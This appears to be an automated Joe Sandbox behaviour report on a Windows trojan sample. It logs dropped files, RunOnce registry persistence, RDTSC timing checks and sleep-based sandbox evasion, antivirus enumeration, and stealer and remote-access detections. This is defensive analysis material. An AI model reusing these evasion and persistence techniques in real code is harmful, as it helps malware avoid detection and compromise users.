        Source: C:\Users\user\Desktop\sgJV11UlDP.exeFile created: C:\Windows\SysWOW64\traveskoen.iniJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeCode function: 0_2_70021A980_2_70021A98
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeCode function: 3_2_0015DC483_2_0015DC48
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeCode function: 3_2_00150ECD3_2_00150ECD
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeCode function: 3_2_0015F36C3_2_0015F36C
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeCode function: 3_2_366EB4B03_2_366EB4B0
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeCode function: 3_2_366EF29F3_2_366EF29F
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeCode function: 3_2_366E2C203_2_366E2C20
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeCode function: 3_2_366EBD803_2_366EBD80
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeCode function: 3_2_366E7BB83_2_366E7BB8
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeCode function: 3_2_366EB1683_2_366EB168
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeCode function: 3_2_366E0EC03_2_366E0EC0
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeCode function: 3_2_366E0EBB3_2_366E0EBB
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeCode function: 3_2_366E2C1B3_2_366E2C1B
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeCode function: 3_2_366E3B4F3_2_366E3B4F
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeCode function: 3_2_366E89083_2_366E8908
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeCode function: 3_2_366E89E73_2_366E89E7
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Unsurveyable197\Busaos.pif 7FD5435121F2CB4320B1BC49400152EC3FECCE7F5CE0ACCE56F32C327126C970
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeCode function: String function: 00402B2C appears 50 times
        Source: sgJV11UlDP.exe, 00000003.00000002.4104889559.0000000035C49000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs sgJV11UlDP.exe
        Source: sgJV11UlDP.exe, 00000003.00000002.4080016403.0000000003178000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs sgJV11UlDP.exe
        Source: sgJV11UlDP.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: classification engineClassification label: mal100.troj.evad.winEXE@3/26@12/2
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeCode function: 0_2_00403248 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403248
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeCode function: 3_2_00403289 lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_00403289
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeCode function: 0_2_0040450D GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,LdrInitializeThunk,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040450D
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeCode function: 0_2_00402138 LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk,0_2_00402138
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeMutant created: NULL
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeMutant created: \Sessions\1\BaseNamedObjects\JIs7HXfvmVwG8wtR
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeFile created: C:\Users\user\AppData\Local\Temp\nso12DA.tmpJump to behavior
        Source: sgJV11UlDP.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeFile read: C:\Users\user\Desktop\sgJV11UlDP.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\sgJV11UlDP.exe "C:\Users\user\Desktop\sgJV11UlDP.exe"
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess created: C:\Users\user\Desktop\sgJV11UlDP.exe "C:\Users\user\Desktop\sgJV11UlDP.exe"
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess created: C:\Users\user\Desktop\sgJV11UlDP.exe "C:\Users\user\Desktop\sgJV11UlDP.exe"Jump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: avicap32.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: msvfw32.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: sgJV11UlDP.exeStatic file information: File size 5329718 > 1048576
        Source: sgJV11UlDP.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

        Data Obfuscation

        barindex
        Source: Yara matchFile source: 00000000.00000002.1864439498.000000000503C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeCode function: 0_2_70021A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_70021A98
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeCode function: 0_2_70022F60 push eax; ret 0_2_70022F8E

        Persistence and Installation Behavior

        barindex
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeFile created: C:\Users\user\AppData\Local\Temp\Unsurveyable197\Busaos.pifJump to dropped file
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeFile created: C:\Users\user\AppData\Local\Temp\Unsurveyable197\Busaos.pifJump to dropped file
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeFile created: C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce AfmystificeringenJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce AfmystificeringenJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce AfmystificeringenJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce AfmystificeringenJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeAPI/Special instruction interceptor: Address: 552CFE4
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeAPI/Special instruction interceptor: Address: 20ACFE4
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeRDTSC instruction interceptor: First address: 54D4ED2 second address: 54D4ED2 instructions: 0x00000000 rdtsc 0x00000002 cmp eax, edx 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F2EE8F3B1BBh 0x00000008 test dx, cx 0x0000000b inc ebp 0x0000000c test cx, C2B2h 0x00000011 inc ebx 0x00000012 test di, 2248h 0x00000017 rdtsc
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeRDTSC instruction interceptor: First address: 2054ED2 second address: 2054ED2 instructions: 0x00000000 rdtsc 0x00000002 cmp eax, edx 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F2EE8E7B3FBh 0x00000008 test dx, cx 0x0000000b inc ebp 0x0000000c test cx, C2B2h 0x00000011 inc ebx 0x00000012 test di, 2248h 0x00000017 rdtsc
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeMemory allocated: 33920000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeMemory allocated: 335B0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeWindow / User API: threadDelayed 7270Jump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeWindow / User API: threadDelayed 2498Jump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeAPI coverage: 1.8 %
        Source: C:\Users\user\Desktop\sgJV11UlDP.exe TID: 3232Thread sleep count: 32 > 30Jump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exe TID: 3232Thread sleep time: -29514790517935264s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exe TID: 3344Thread sleep count: 7270 > 30Jump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exe TID: 3344Thread sleep count: 2498 > 30Jump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeCode function: 0_2_004062F0 FindFirstFileA,FindClose,0_2_004062F0
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeCode function: 0_2_004057B5 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004057B5
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeCode function: 0_2_00402765 FindFirstFileA,0_2_00402765
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeCode function: 3_2_00402765 FindFirstFileA,3_2_00402765
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeCode function: 3_2_004062F0 FindFirstFileA,FindClose,3_2_004062F0
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeCode function: 3_2_004057B5 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,3_2_004057B5
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: sgJV11UlDP.exe, 00000003.00000002.4080016403.000000000316C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWO
        Source: sgJV11UlDP.exe, 00000003.00000002.4080016403.0000000003132000.00000004.00000020.00020000.00000000.sdmp, sgJV11UlDP.exe, 00000003.00000002.4080016403.000000000316C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeAPI call chain: ExitProcess graph end nodegraph_0-4340
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeAPI call chain: ExitProcess graph end nodegraph_0-4165
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeCode function: 0_2_00403248 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403248
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeCode function: 0_2_70021A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_70021A98
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeMemory allocated: page read and write | page guardJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess created: C:\Users\user\Desktop\sgJV11UlDP.exe "C:\Users\user\Desktop\sgJV11UlDP.exe"Jump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeQueries volume information: C:\Users\user\Desktop\sgJV11UlDP.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeCode function: 0_2_00403248 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403248
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: sgJV11UlDP.exe, 00000003.00000002.4105711046.0000000036540000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
        Source: sgJV11UlDP.exe, 00000003.00000002.4105711046.0000000036540000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ws Defender\MsMpeng.exe
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 00000003.00000002.4104301125.0000000033921000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: sgJV11UlDP.exe PID: 6560, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 00000003.00000002.4104301125.0000000033921000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: sgJV11UlDP.exe PID: 6560, type: MEMORYSTR
